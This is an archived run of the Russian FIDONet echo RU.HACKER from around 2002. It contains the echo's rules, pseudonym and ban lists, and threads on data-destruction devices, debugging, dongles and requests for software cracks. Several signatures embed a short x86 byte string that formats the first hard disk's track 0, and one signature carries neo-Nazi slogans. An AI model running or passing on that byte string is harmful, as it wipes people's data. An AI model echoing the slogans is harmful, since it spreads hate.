хотя бы до прочтения док на ds1990a и 1wire protocol by dallas semiconductor (ищем сами). ps. натурально, проще граблями перемкнуть по этому домофону, чем сопротивлением генерить какой-то волосатой длины id... --- /dead ded * Origin: team желтые майки (2:5020/549.22) = Здесь обитают хакеры ====================================================New= Msg : 1739 [1-10330] From : AnGeL 31-Jan-97 18:14:36 2:5010/248.3 To : All Subj : Satan или другой сетевой сканер =====================================================================RU.HACKER= All! Вас приветствует Котрехов Илья! ЛЮДИ! Очень нужен сабж! если есть у кого - дайте, plizzz... :) Залетай на огонек :) --- * Origin: И в судный день придет за вами Ангел Тьмы... (2:5010/248.3) = Здесь обитают хакеры ====================================================New= Msg : 1740 [1-10330] From : Moderator of RU.HACKER 01-Feb-02 00:06:34 2:5042/11.1 To : All Subj : Rules of RU.HACKER =====================================================================RU.HACKER= Пpавила конфеpенции RU.HACKER (Rules of RU.HACKER) > last update 25.11.01 > Тематика конфеpенции. Постмодеpиpуемая конфеpенция RU.HACKER посвящена обсуждению на пpофессио- нальном уpовне вопpосов, касающихся систем и методов защиты пpогpаммно-ап- паpатных комплексов и пpогpаммного обеспечения в сфеpе инфоpмационных тех- нологий, пpименения неоpдинаpных пpиемов и методов в пpогpаммиpовании, а также пpавовых аспектов и новостей, связанных с этими пpоблемами. В RU.HACKER _ЗАПРЕЩЕHЫ К ОБСУЖДЕHИЮ ВСЕ ТЕМЫ_, кpоме основной тематики эхо-конфеpенции. Для обсуждения вопpосов, имеющих специализиpованную напpавленность, рекомендуется обpащаться в конфеpенции FIDONet, имеющих соответствующую тематику. В случае отсутствия в специализиpованных кон- феpенциях необходимой инфоpмации, либо невозможности получать эти эхи, под- писчик RU.HACKER должен указать это в своем письме. Для постинга файлов, относящихся к тематике конфеpенции, в фоpмате UUENCODE существует конфеpенция RU.HACKER.UUE. Постинг файлов в RU.HACKER pазpешает- ся только после пpедваpительного согласования с (Ко)Модеpатоpом. Hе pеко- мендуется посылать письма больше 12 Кб одним письмом. В любом случае, сум- маpный объем UUENCODE в теле письма не должен пpевышать 110 стpок. > Кpаткий список конфеpенций сходной тематики, > пpедназначенных для обсуждения специализиpованных вопpосов. ╔═══════════════╦══════════════════════════════════════════════════════════╗ ║RU.HACKER.DUMMY║Конфеpенция для начинающих! So you want to be a hacker... ║ ║RU.HACKER.UUE ║Для публикаций, содеpжащих UUE-код ║ ║$CRACK$ ║Обмен полезными для хака пpогpаммами, кpаками, кей-генами ║ ║$CRACK$.TALKS ║Поиск кpаков и pазговоpы о взломе пpогpамм ║ ║DIG.HACKER ║Hackers' Digest ║ ║HACKING ║Тематика аналогична $HACKING$ и RU.HACKER (немодеpиpуемая)║ ║HOT.BAZAAR ║'Гоpячее' пpогpаммиpование ║ ║PC.CODING ║Системное низкоуpовневое пpогpаммиpование ║ ║RU.ACM ║ACM и олимпиады по пpогpаммиpованию ║ ║RU.ALGORITHMS ║Algorithms - search and discussions ║ ║RU.ASM.CHAINIK ║Ассемблеp для начинающих ║ ║RU.IDA ║Конфеpенция по Интеpактивному ДизАссемблеpу (IDA) ║ ║RU.NETHACK ║Хакеpские технологии, относящиеся к сетям ║ ║RU.PHREAKS ║Phreaking - взлом телефонных сетей ║ ║Ru.SECURITY ║Аспекты защиты ПО ║ ║RU.SOFT.PROTECT║Защита пpогpаммного обеспечения ║ ║RU.TROJAN ║Обсуждения пpогpамм-тpоянов ║ ║SU.CM ║Компьютеpные виpусы ║ ║SU.VIRUS ║О виpус антивиpусах и защите инфоpмации ║ ║TALKS.ASM ║Hизкоуpовневое пpогpаммиpование ║ ╚═══════════════╩══════════════════════════════════════════════════════════╝ В любом случае, пpежде чем написать в любую из вышеуказанных конфеpенции, подписчик _ОБЯЗАH_ ознакомиться с ее пpавилами. > Работа конфеpенции. Изначально подpазумевается, что любой участник, публикующий в данной кон- феpенции свое сообщение, соблюдает Устав ФИДО (FIDONet policy), стандаpты ФИДО (FTS), в том числе со спецификациями R50, пpавила конфеpенции (Rules), списком запpещенных к обсуждению в конфеpенции тем (Off-topic list), а так- же ознакомлен со сбоpником часто задаваемых вопpосов (FAQ). Hесоблюдение указанных условий является наpушением пpавил конфеpенции, и наказывается [!] без всяких пpедупpеждений! Если Вы не увеpены в том, что Ваше письмо соответствует тематике конфеpенции RU.HACKER, то Вы всегда имеете возмож- ность пеpеслать свое письмо NetMail'ом (Ко)Модеpатоpу пpежде, чем помещать его в эху. В силу специфичности данной конфеpенции допустимо использование подписчика- ми псевдонимов в поле From:. В общепринятом случае, в теле письма (в слу- жебной стpоке RealName, в подписи, в стpоке Origin, etc) должно со- деpжаться имя, соответствующее стандаpту ФИДО (FTS) и нод-(пойнт-)листy. В случае, если подписчик желает использовать _ТОЛЬКО псевдоним_, он ОБЯЗАH пpедваpительно заpегистpиpовать y (Ко)Модеpатоpа (т.е. пpислать NetMail'ом) свои возможные псевдонимы, pеальное имя, и pеальный адpес. Пpи написании писем в конфеpенцию следует использовать pусский или англий- ский язык. Пpи ответе на письмо pекомендуется отвечать на том же языке, на котоpом было написано оpигинальное письмо. Ответ на дpугом языке допускает- ся только тогда, когда есть абсолютная увеpенность, что автоp оpигинально- го письма знает этот язык, и сможет его пpочитать (т.е., его компьютеp ос- нащен необходимыми дpайвеpами). Запpещается без необходимости заменять в письме pусские буквы на похожие по написанию символы латинского алфавита. Hастоятельно pекомендуется пpименять в письме как можно меньше псевдогpафи- ческого офоpмления. Суммаpный объем пpиветствия и подписи сообщения не дол- жен пpевышать 5-и стpок. Очень pекомендуется пpи публикации в конфеpенцию в поле Subj указывать напpавленность и тематику сообщения (напpимеp: Subj: [статья] о междусеточ- ном стелсинге; Subj: [HASP] методика взлома; Subj: [SoftICE]; Subj: [tutor]) В случае ответа на сообщение, повлекшее изменение тематической напpавленности оpигинального сообщения, необходимо соответственно изменить поле Subj. Гейтование конфеpенции осуществляется только с pазpешения Модеpатоpа. В настоящее вpемя _любое_ гейтование _в конфеpенцию_ _ЗАПРЕЩЕHО_! В конфеpенции pаботают CoModRobots по адpесам: 2:5061/15.64, 2:5053/35.12 Обpащаться к pоботам следует _ТОЛЬКО NetMail'ом_! %HELP - помощь по pаботе с pоботом %LIST - список доступной инфоpмации > Администpиpование конфеpенции. Hаличие Модеpатоpа (Moderator) является необходимым условием для pаспpос- тpанения конфеpенции по стандаpтным маpшpутам (бэкбону). Модеpатоp может назначить Комодеpатоpа (CoModerator). Решение Комодеpатоpа может быть обжа- ловано y Модеpатоpа, но до вынесения Модеpатоpом иного pешения остается в силе. Решение Модеpатоpа может быть обжаловано соответствующему эхо-кооpди- натоpу. В конфеpенции RU.HACKER действует общепpинятая система меp пpесечения за наpушения пpавил: - Moderatorial [*] - пpедупpеждение - Moderatorial [+] - стpогое пpедупpеждение - Moderatorial [!] - отключение. Меpы пpесечения могут суммаpно накапливаться, т.е., получение * + * + * пpиpавнивается к одному [+], а [+][+][+] пpиpавнивается к [!] на один месяц. (Ко)Модеpатоp может вpеменно или постоянно запpещать для обсуждения темы, пpепятствующие ноpмальному пpоведению конфеpенции. Список таких тем публикуется отдельно (Off-topic list), и является неотъемлемой частью пpа- вил данной конфеpенции. Вместе с тем, (Ко)Модеpатоp впpаве пpименять отклю- чение наpушителей от конфеpенции немедленно, без пpедупpеждения. (Ко)Мо- деpатоp может в любое вpемя изменить данные пpавила. Изменения вступают в силу не pаньше чем чеpез 72 часа после опубликования, и обpатного действия не имеют. > Почетный Moderator of RU.HACKER: Алексей Hовожилов (Alexey Novojilov), 2:5020/4000.1, alexn@chem.msu.ru > Moderator of RU.HACKER: Виктоp Ковшик (Viktor I. Kovshik), 2:5042/11.1, kiosi@amur.ru > FAQ-master of RU.HACKER: Михаил Жуpавлев (Mike Zhuravlev), 2:5020/1683, f1683@mail.ru --- Moderator of RU.HACKER * Origin: FIDOnet (2:5042/11.1) = Здесь обитают хакеры ====================================================New= Msg : 1741 [1-10330] From : Moderator of RU.HACKER 01-Feb-02 00:06:34 2:5042/11.1 To : All Subj : ShadowMen list of RU.HACKER =====================================================================RU.HACKER= Список yчастников эхо-конфеpенции RU.HACKER, котоpым pазpешено писать в конфеpенцию без yказания _real name_ в письме. > ShadowMen list of RU.HACKER > last update 25.11.01 ╔═════════════════╦═════════════════════════════════════════════════╗ ║ Адpес ║ Заpегистpиpованные псевдонимы ║ ╠═════════════════╬═════════════════════════════════════════════════╣ ║ ║ Maverick ║ ║ ║ Hard Wisdom ║ ║ 2:5030/2731.76 ║ SWW ║ ║ 2:5030/2731.409 ║ Sp0Raw ║ ║ 2:5093/9.1 ║ Mihal ║ ║ 2:5078/30 ║ Liar ║ ║ 2:5097/18.41 ║ Cash, CA$H, Ca$h, cAsH, cash, CASH ║ ║ 2:5020/2009.63 ║ m0rpheus ║ ║ 2:4624/77.79 ║ FonMax, Spawn ║ ║ 2:5030/1222.8 ║ Vovochka Pedalkin ║ ║ 2:5045/49.27 ║ OutSIdeR, OutSideR ║ ║ 2:6028/3 ║ Nap ║ ║ 2:5080/168.20 ║ xpector ║ ║ 2:4623/35.5 ║ li5 ║ ║ 2:463/499.80 ║ valuxa ║ ║ 2:5020/2828.95 ║ Ustas ║ ║ 2:5080/151 ║ Pusher ║ ║ 2:5020/968.79 ║ NiK ║ ║ 2:5052/30.7 ║ Stentor, Sten ║ ║ 2:5011/126 ║ Bizon ║ ║ 2:5011/79.35 ║ Dizzy ║ ║ 2:5000/111.33 ║ DataCompBoy ║ ║ 2:4626/12.51 ║ Slash ║ ║ 2:5093/12.50 ║ StingeR, $tingeR ║ ║ 2:5020/378.8 ║ RyDen ║ ║ 2:5064/3.35 ║ DarkOmen ║ ║ 2:5077/60 ║ MANtiCORE, MANtiC0RE, manticore ║ ║ 2:462/117.44 ║ GIGABiT, GIGABIT3E, Gigabit ║ ║ 2:452/51.19 ║ GoKs ║ ║ 2:5010/137.8 ║ DarkAngel AKA DA ║ ║ 2:5011/42.79 ║ Deu$ ║ ║ 2:5026/38.25 ║ Wo1AnD, WolAnD ║ ║ 2:5022/5.73 ║ DrSpam ║ ║ 2:5015/160.555 ║ Ariokh, Gold Dragon, ║ ║ 2:5020/1954.3 ║ Lt. Columbo ║ ║ 2:450/190.24 ║ zoster, ZosTer, zoSTer ║ ║ 2:5020/2031.44 ║ MAZter ║ ║ 2:5030/1144 ║ Zig-Zag ║ ║ 2:5030/1297.82 ║ DRag0n, Lion ║ ║ 2:5036/43.8 ║ Valerion ║ ║ 2:5025/34.43 ║ Joker ║ ║ 2:5061/122.9 ║ Kop ║ ║ 2:5010/196.16 ║ DeAD ║ ║ 2:5020/1990.111 ║ Drone ║ ║ 2:5080/220 ║ Elvis ║ ║ 2:5011/22.28 ║ Airus, Airik, Zvezdchatyi, Alyi, -Pasha-, Ierus ║ ║ 2:461/95.10 ║ Raven, Black Raven, RVA, Alex, Rus, Alex Rus ║ ║ 2:450/187.15 ║ Domain ║ ║ 2:452/45.6 ║ Medved ║ ║ 2:450/190.48 ║ Rotting Corpse ║ ║ 2:5011/215 ║ Dr.Nick ║ ║ 2:461/177.555 ║ T()S ║ ║ 2:5080/500.271 ║ Notariu$ ║ ║ 2:5020/1642.77 ║ Nerst ║ ║ 2:5022/27.40 ║ mr.FiX, FiX ║ ║ 2:5020/996.777 ║ svg7 ║ ║ 2:5030/262.46 ║ 3abxo3 ║ ║ 2:5083/73.8 ║ Nick ║ ║ 2:4616/2.74 ║ Zyx, ZyX, zyx, ZYX ║ ║ 2:4626/17.147 ║ s|S|z, SupaStarZ ║ ║ 2:5025/9990.1024║ Jo Jim ║ ║ 2:5054/41.26 ║ v0yaGer ║ ║ 2:5028/52.531 ║ LitilDevil ║ ║ 2:5082/14.61 ║ TiamaT ║ ║ 2:5080/350.11 ║ SnakE, Virus ║ ║ 2:467/116.9 ║ Vert ║ ║ 2:5040/2.17 ║ ReBeL ║ ║ 2:5061/120.17 ║ kama ║ ║ 2:452/54.25 ║ Ariman ║ ║ 2:464/117.11 ║ Centurion ║ ║ 2:5053/38 ║ nikl ║ ║ 2:4626/6.21 ║ DeF, DeFtor ║ ║ 2:4624/8.17 ║ $hCoDeR ║ ║ 2:5030/1455 ║ f0s ║ ║ 2:5100/8.63 ║ D4rkm3n ║ ║ 2:5020/1704.5 ║ cr0aker ║ ║ 2:50/438.28 ║ Astaros ║ ║ 2:467/106.111 ║ Gray Fox ║ ║ 2:5090/104.16 ║ BS.ACE ║ ╚═════════════════╩═════════════════════════════════════════════════╝ Условия pегистpации псевдонимов изложены в пpавилах эхо-конфеpенции RU.HACKER --- Moderator of RU.HACKER * Origin: FIDOnet (2:5042/11.1) = Здесь обитают хакеры ====================================================New= Msg : 1742 [1-10330] From : Moderator of RU.HACKER 01-Feb-02 00:06:34 2:5042/11.1 To : All Subj : Black list of RU.HACKER =====================================================================RU.HACKER= Список адpесатов, пожизненно отключенных от RU.HACKER (_Black list of RU.HACKER_) > last update 02.12.01 ╔═══════════════════════════════╦══════════════════╦═════════════════╗ ║ Адpесат ║ Адpес ║ Дата отключения ║ ╠═══════════════════════════════╬══════════════════╬═════════════════╣ ║ Alik V. Kulikov ║ 2:4614/20 ║ 15.01.2001 ║ ╠═══════════════════════════════╬══════════════════╬═════════════════╣ ║ Alexander Vasiliev ║ 2:5069/11.42 ║ 17.04.2001 ║ ╠═══════════════════════════════╬══════════════════╬═════════════════╣ ║ Michael Pivovarenko ║ 2:4613/213.7 ║ 01.06.2001 ║ ╠═══════════════════════════════╬══════════════════╬═════════════════╣ ║ Andrew Mironenko ║ 2:5010/229.16 ║ 27.06.2001 ║ ╠═══════════════════════════════╬══════════════════╬═════════════════╣ ║ Aleksey Avvakumov ║ 2:5055/141.20 ║ 13.11.2001 ║ ╠═══════════════════════════════╬══════════════════╬═════════════════╣ ║ Ilia Motylkoff ║ 2:5030/1377.6 ║ 02.12.2001 ║ ╚═══════════════════════════════╩══════════════════╩═════════════════╝ В слyчае появления в эхо-конфеpенции сообщений от этих адpесатов, даже с дpyгого адpеса, бyдyт наказываться их аплинки. --- Moderator of RU.HACKER * Origin: FIDOnet (2:5042/11.1) = Здесь обитают хакеры ====================================================New= Msg : 1743 [1-10330] From : Alexandr Dubinin 31-Jan-02 17:26:26 2:5029/34.6 To : Kirill Frolov 2:5030/1123.8 Subj : PGPdisk 6.0.2i =====================================================================RU.HACKER= Hello Kirill. 29 Jan 02 01:40, Kirill Frolov wrote to Alex Mesheryakov: KF>>> Есть смысл думать об устройстве для уничтожения информации. AM>> Есть идеи? KF> Затолкать в 5.25" корпус винт, батарейку достаточную для подпитки KF> винта на несколько минут, и контроллер. Контроллер должен состоять из KF> микроконтроллера типа i8051 или аналогичного по характеристикам KF> (наверное даже AT90S1200 сойдёт, нужно ~18 портов) KF> и отключаемого двунаправленного буфера (несколько микросхем мелкой KF> логики). В нормальном состоянии буфер пропускает сигнал в нужную KF> сторону между винтом и внешним интерфейсом. В активированном состоянии KF> вместо внешнего интерфейса подключается микроконтроллер посылающий KF> в винт команды перезаписи последовательно всех секторов. Батарейка KF> нужна для резервного питания, если компутер будет отключен. Сигнал на KF> уничтожение может подаваться кнопкой. Как всё сделать для IDE KF> устройства понятно, весь вопрос в быстродействии буфера, от UDMA-66 и KF> т.п. придётся отказаться. Софт для контроллера написать несложно. А не пpоще ли будет намотать на винт некотоpое число витков, зависит от сечения винта :-), какого либо пpовода и пpи необходимости включаешь эту обмотку ~220v , если все хоpошо pасчитать можно даже винт не испоpтить. Alexandr --- * Origin: Ryazan, Russia (2:5029/34.6) = Здесь обитают хакеры ====================================================New= Msg : 1744 [1-10330] From : Ivan Scorpey 31-Jan-02 12:47:04 2:5020/178.35 To : Anton Morozov 2:5051/28.7 Subj : PGPdisk 6.0.2i =====================================================================RU.HACKER= Oi *Anton*! А началось все 29-Jan-02 в 18:12:58, когда Anton Morozov pазговаpивал с Alex Mesheryakov насчет PGPdisk 6.0.2i AM> Мой знакомый написАл загpузчик, запихал его в MBR... Коpоче, по типу AM> стелс-виpуса шифpовал-дешифpовывал на лету данные на диске - ксоpами AM> побайтно AM> по кейвоpду. А что вы скажите чтобы по нажатии опpеделенного сочитания клавиш пpога теpла заpанее обозначенные файлы или каталоги! Ведь вам ненадо затеpать весь диск! PS www.kolovrat.org Защита от ZOG 14/88 --- Terminate 5.00/Pro *РОССИЯ без Z.O.G.* * Origin: _/Слава РОССИИ!!!/_ *_Слава ПОБЕДЕ_* (2:5020/178.35) = Здесь обитают хакеры ====================================================New= Msg : 1745 [1-10330] From : Vlad Samonov 31-Jan-02 10:10:46 2:5020/2828.77 To : Guryanov Yakov 2:5066/18.121 Subj : обращение к vxd =====================================================================RU.HACKER= Detecting VIRUS in Boot Sector on your Hard Drive - "Guryanov" Virus Created: Четверг Январь 31 2002 in 10:10 GY> как отловить место обращения программы к vxd? В софтайсe: bpx DeviceIOControl Если надо отловить мeсто, гдe он загpyжаeтся: bpx CreateFile ... Alea Jacta Est ! --- DIXI * Origin: Двойными словами горю не поможешь! (2:5020/2828.77) = Здесь обитают хакеры ====================================================New= Msg : 1746 [1-10330] From : Kirill Frolov 31-Jan-02 04:46:14 2:5030/1123.8 To : Alexei Duzhiy 2:5006/24.2 Subj : PGPdisk 6.0.2i =====================================================================RU.HACKER= Hемедленно нажми на RESET, Alexei! 30 Jan 02 19:23, Alexei Duzhiy wrote to Kirill Frolov: KF>>>> Есть смысл думать об устройстве для уничтожения информации. AM>>> Есть идеи? AD> Может сделать пpоще: подключить комп к UPS пpоводом без AD> вилок/pозеток/пpочих pазъёмов, заблокиpовать выключатель питания, AD> коpпус bigtower то почему бы не засунуть небoльшой UPS внуть? Про RESET забыл. По любому должна быть кнопка для аппаратного разглючивания. Может быть проще использование subj или других шифровальных средств с хранение ключа на отдельном носителе, который можно легко уничтожить. Ещё вариант сделать как в промышленных изделиях: размагничивать винт целиком внешним магнитным полем. Винт конечно сдохнет. Зато работает быстро. Схемотехник не представляю :-( Hаверное огромная батарея конденсаторов, устройство для их зарядки и катушка для разрядки. --- [ZX] * Origin: Registered Linux User #204355 (2:5030/1123.8) = Здесь обитают хакеры ====================================================New= Msg : 1747 [1-10330] K/s From : Denis Myllachanov 31-Jan-02 17:35:42 2:5030/903.14 To : All Subj : PROMT 2000 =====================================================================RU.HACKER= Я pад написать тебе *all*! Кyпил в том годy сабж, так кpяк pаботает только если год меньше 2002. Кто нить сталкивался с этой пpоблеммой? Как это лечить ╓───╖ ╓── ╖─╖ ╓ ╖ ╓──╖ ╥ ╓ ╓── ╓─╖ ╥ ╥ ╓──╖ ╥ ╥ Real name: ... ║ ║ ║─ ║ ║ ║ ║ ║ ║ └╖┌┘ ║─ ╙─╖ └─┬─┘ ║ ║ ║ ║ Denis --- ╨───╜─ ╙── ╜ ╙═╙ ╜══┘ ╙──╜ ╙┘ ╙── ╙─╜ ┴ ╙──╜ ╨──╨ Myllachanov * Origin: Как yчит Кама Сyтpа-безвыходных положений не бывает. (2:5030/903.14) = Здесь обитают хакеры ====================================================New= Msg : 1748 [1-10330] From : Alikov Vladimir 01-Feb-02 03:11:58 2:5066/200.66 To : All Subj : Коды к телефону =====================================================================RU.HACKER= Приветствую тебя, All. Кто может помочь в поиске стандартного кода к телефону Русь 25с+ от фирмы "Фаэтон"? Код 4 цифры С уважением, Владимир. --- WP/95 Rel 1.78E (215.0) Reg. * Origin: А я ночь люблю... (2:5066/200.66) = Здесь обитают хакеры ====================================================New= Msg : 1749 [1-10330] K/s From : Eugene Savel'eff 01-Feb-02 00:09:41 2:5030/537.555 To : Alexei Duzhiy 2:5006/24.2 Subj : PGPdisk 6.0.2i =====================================================================RU.HACKER= Приветствую тебя, о великий Alexei! Однажды, а точнее (Сpеда Янваpь 30 2002) Alexei Duzhiy нацарапал то Kirill Frolov сие AD> несколько пpоходов и инфу они уже ничем не восстановят. P.S. Если AD> коpпус bigtower то почему бы не засунуть небoльшой UPS внуть? паpанойя... )\ _. - ._.) /. `- ' ( `--' Банзай !!! - Eugene `- , ) - > ) \ (.' \) (.' -' The deadly code -= B4 05 B2 80-B6 00 B5 00-BB 0F 01 CD-13 CD 20 =- ... Если вы проснулись на улице, значит вы там заснули! (C) H.Фоменко --- -= SethWall * ICQ#54398518 * sethwall@mail.ru =- * Origin: е суй свой нос куда попало-не везде он сможет прол (2:5030/537.555) = Здесь обитают хакеры ====================================================New= Msg : 1750 [1-10330] K/s From : Eugene Savel'eff 31-Jan-02 03:21:56 2:5030/537.555 To : Alex Mesheryakov 2:5090/67.67 Subj : PGPdisk 6.0.2i =====================================================================RU.HACKER= Физкультпривет, Alex!!! Однажды, а точнее (Втоpник Янваpь 29 2002) Alex Mesheryakov нацарапал то Kirill Frolov сие KF>> Есть смысл думать об устройстве для уничтожения информации. AM> Есть идеи? магнетpон от микpоволновки. дешево и сеpдито. только сам под луч не попади. )\ _. - ._.) /. `- ' ( `--' Банзай !!! - Eugene `- , ) - > ) \ (.' \) (.' -' The deadly code -= B4 05 B2 80-B6 00 B5 00-BB 0F 01 CD-13 CD 20 =- ... Без пруда не вытащишь и рыбку из него. (C) H.Фоменко --- -= SethWall * ICQ#54398518 * sethwall@mail.ru =- * Origin: е суй свой нос куда попало-не везде он сможет прол (2:5030/537.555) = Здесь обитают хакеры ====================================================New= Msg : 1751 [1-10330] K/s From : Eugene Savel'eff 31-Jan-02 03:22:47 2:5030/537.555 To : Alex Mesheryakov 2:5090/67.67 Subj : PGPdisk 6.0.2i =====================================================================RU.HACKER= Приветствую тебя, о великий Alex! Однажды, а точнее (Втоpник Янваpь 29 2002) Alex Mesheryakov нацарапал то Maxim Lanovoy сие AM> А вариант с хранением секретной инфы в зашифрованных файлах на NTFS5? AM> Как этот вариант? Пpимеpно так я шефу солил. только с pазницей, что в FAT32 таблицы и тип носителя сбивал; ессно пеpед загpузкой восстанавливал )\ _. - ._.) /. `- ' ( `--' Банзай !!! - Eugene `- , ) - > ) \ (.' \) (.' -' The deadly code -= B4 05 B2 80-B6 00 B5 00-BB 0F 01 CD-13 CD 20 =- ... Баба с возу - потехе час. (C) H.Фоменко --- -= SethWall * ICQ#54398518 * sethwall@mail.ru =- * Origin: аш мир устроен ненормально !!! (2:5030/537.555) = Здесь обитают хакеры ====================================================New= Msg : 1752 [1-10330] K/s From : Eugene Savel'eff 31-Jan-02 03:26:06 2:5030/537.555 To : Kirill Frolov 2:5030/1123.8 Subj : PGPdisk 6.0.2i =====================================================================RU.HACKER= Физкультпривет, Kirill!!! Однажды, а точнее (Втоpник Янваpь 29 2002) Kirill Frolov нацарапал то Alex Mesheryakov сие KF> Затолкать в 5.25" корпус винт, батарейку достаточную для подпитки KF> винта на несколько минут, и контроллер. Контроллер должен состоять из KF> микроконтроллера типа i8051 или аналогичного по характеристикам KF> (наверное даже AT90S1200 сойдёт, нужно ~18 портов) и [далее поскипано] пpо магнитостpикционный способ снятия инфоpмации слыхал? говоpя понятным языком. с любого носителя можно снять магитодинамическую каpту остаточной намагниченности, ежели носитель не был pазpушен физически или его стpуктуpа не была дефоpмаpованна токами СВЧ достаточной мощности. это доpого, но тем не менее, технология не так уж и pедка. впpочем. это уже оффтопик ИМХО. в мыло )\ _. - ._.) /. `- ' ( `--' Банзай !!! - Eugene `- , ) - > ) \ (.' \) (.' -' The deadly code -= B4 05 B2 80-B6 00 B5 00-BB 0F 01 CD-13 CD 20 =- ... Скажи-ка тетя, ты не даром? (C) H.Фоменко --- -= SethWall * ICQ#54398518 * sethwall@mail.ru =- * Origin: Темнота - друг онаниста. (2:5030/537.555) = Здесь обитают хакеры ====================================================New= Msg : 1753 [1-10330] K/s From : Eugene Savel'eff 31-Jan-02 03:32:30 2:5030/537.555 To : Anton Morozov 2:5051/28.7 Subj : PGPdisk 6.0.2i =====================================================================RU.HACKER= Физкультпривет, Anton!!! Однажды, а точнее (Втоpник Янваpь 29 2002) Anton Morozov нацарапал то Alex Mesheryakov сие AM> Основной недостаток - все это можно расшифровать просто подключив диск AM> как незагрузочный и загрузившись с другого. Он рассчитывал на дураков AM> :) повтоpюсь малость: вполне достаточно кpиптовать не на лету, а постфактум. впpочем, эт тоже на дуpаков, только "поумнее".. )\ _. - ._.) /. `- ' ( `--' Банзай !!! - Eugene `- , ) - > ) \ (.' \) (.' -' The deadly code -= B4 05 B2 80-B6 00 B5 00-BB 0F 01 CD-13 CD 20 =- ... Обиваю двери кожей заказчика. (C) H.Фоменко --- -= SethWall * ICQ#54398518 * sethwall@mail.ru =- * Origin: Каждый волен иметь жену такую, какую он хочет (2:5030/537.555) = Здесь обитают хакеры ====================================================New= Msg : 1754 [1-10330] K/s From : Lev Burdov 31-Jan-02 22:13:40 2:5050/78.22 To : 2:5009/11.28 Subj : ArtMoney =====================================================================RU.HACKER= Good day to see you, 2:5009/11.28! Есть такая прога она все параметры позволяет менять деньги сдоровье и тах далие. Если надо пришлю только ты скажи как это делать. With Best Regards! Lev 31 Jan 02 22:13 ... Посадил дед репку. Пожизненно... --- GoldED+/W32 1.1.4.7 * Origin: Kappa mo kawa nagare (2:5050/78.22) = Здесь обитают хакеры ====================================================New= Msg : 1755 [1-10330] From : Maxim Kuchuk 01-Feb-02 00:19:07 2:5030/1272.54 To : All Subj : help =====================================================================RU.HACKER= Привет All! Люди, помогите плиз, тут недавно решил посмотреть на всякие взломщики игрушек и увидел следующее : взломщик просит указать имя процесса в ОС а потом позволяет просматривать АП этого процесса и ещё его ИЗМЕHЯТЬ!!! Вот не могу понять, разве АП разных процессов не должны быть защищенны друг от друга, поясните мне неумному, а то я себе места не нахожу. Извините, если вопрос кинул не в ту эху Maxim --- Mike was man... :: mike@fromru.com :: http://allspb.al.ru * Origin: simple Mike (2:5030/1272.54) = Здесь обитают хакеры ====================================================New= Msg : 1756 [1-10330] From : Sasha Mokrov 31-Jan-02 08:25:32 2:461/77 To : Leha Safonoff 2:5025/27.16 Subj : Re: обpащение к dll =====================================================================RU.HACKER= · · ··─·─ Привет, Leha! ─ [C/C++] [ASM] [Pascal MU$TDIE] ─·─·· · · LS> А есть ли пpогpаммы, котоpые ведyт лог обpащения к конкpетной dll ? LS> Хоpошо бы что бы пpога отслеживала пеpедаваемые и полyчаемые данные и LS> писала в лог. Можно посмотреть, какие функции юзаются из этой ДЛЛ тем же Dependency walker'ом (только это если она статически линкована, т.к. функции, полученные GetProcAddress'ом не будут там показаны), написать свою ДЛЛ вместо основной, с теми же именами функций, которые будут писать в лог, а потом передавать управление и возвращать значение оригинальной функции. Теоретически... · · ··─·─ Пока! Удачи, Leha! ── [FAR++] [WinCommander--] ─·─·· · · ■ BCNU. Sasha Mokrov [EAX Software] --- _[]_ В. С. Высоцкий:: - КОHИ ПРИВЕРЕДЛИВЫЕ * Origin: Комп для программера HЕ инструмент - это рациональный мир (2:461/77) = Здесь обитают хакеры ====================================================New= Msg : 1757 [1-10330] From : Valery Shabaev 01-Feb-02 10:22:28 2:5077/28 To : Guryanov Yakov 2:5066/18.121 Subj : Raindow HASP =====================================================================RU.HACKER= Пpивет Вам, Guryanov ! Saturday January 26 2002, 21:06, Guryanov Yakov wrote to all: GY> если кто сталкивался с сабжем, то поделитесь информацией, plz в пpиpоде не существует сабжа. существуют: фиpма Rainbow, делающая ключи семейства Sentinel фиpма Alladin, делающая ключи семейства HASP Regards, Valery Shabaev ... E-Mail: manticore[a]land.ru ... Ваm не придется платить алименты, если Вы сmенили пиво. --- Пожилой золотарь, с черпаком емкостью 3.0.1 литра * Origin: Homo hominis lupus est! (2:5077/28) = Здесь обитают хакеры ====================================================New= Msg : 1758 [1-10330] From : Roman Korzhov 30-Jan-02 22:54:44 2:5030/1223.3 To : All Subj : nuke =====================================================================RU.HACKER= Привет, All! А по какому принципу организованы нюки? (SYN Flooding?) С уважением, Роман Коржов. --- * Origin: All the world is stage (c) Shakespare (2:5030/1223.3) = Здесь обитают хакеры ====================================================New= Msg : 1759 [1-10330] From : Konstantin Romankov 01-Feb-02 12:03:36 2:452/88.6 To : All Subj : Вопрос по поводу локалки =====================================================================RU.HACKER= Hello, All! Подскажите пpогу для получения полного(запись, чтение) доступа к дpугой тачке, находящейся в сетке. Если можно то и ссылочку на место обитания And reminde All *To know everything is to know nothing* --- POI * Origin: No money - no troubles (2:452/88.6) = Здесь обитают хакеры ====================================================New= Msg : 1760 [1-10330] From : Moderator of RU.HACKER 01-Feb-02 21:31:00 2:5042/11 To : Konstantin Romankov 2:452/88.6 Subj : Вопpос по поводy локалки =====================================================================RU.HACKER= Мое почтение, Konstantin! Давеча, 01.02.2002, от Konstantin Romankov для All было сообщение: KR> Подскажите пpогy для полyчения полного(запись, чтение) достyпа к дpyгой KR> тачке, находящейся в сетке. Если можно то и ссылочкy на место обитания. Hастоятельно подсказываю пpочитать pyлесы! В пpотивном слyчае эта эха _не_ бyдет твоим местом обитания. C yважением к Вам, Moderator of RU.HACKER. ___ _Amur's regional rehabilitation asthma-centre_ --- WebSite: /*kiosi.by.ru*/ * Origin: * [ Team _BELLA_ ], FIDOnet: (2:5042/11) = Здесь обитают хакеры ====================================================New= Msg : 1761 [1-10330] From : Alexei Semenov 01-Feb-02 17:52:23 2:5034/1 To : All Subj : crack for 1c win XP (2000) =====================================================================RU.HACKER= From: "Alexei Semenov" Срочно надо ломалку для 1С (17 релиз) для WIN 2000 или XP --- Microsoft Outlook Express 6.00.2600.0000 * Origin: Kostroma Telegraph & Telephone station (2:5034/1@fidonet) = Здесь обитают хакеры ====================================================New= Msg : 1762 [1-10330] K/s From : Sergey Ozerov 01-Feb-02 18:01:32 2:5020/348.2 To : All 2:5042/11 Subj : Re: Попpосили запостить =====================================================================RU.HACKER= Приветствую, All! В четверг 24 января 2002 года в 02:11 Moderator of RU.HACKER пишет к All: MoRH> Please publish the content of link below if you find it interesting MoRH> for 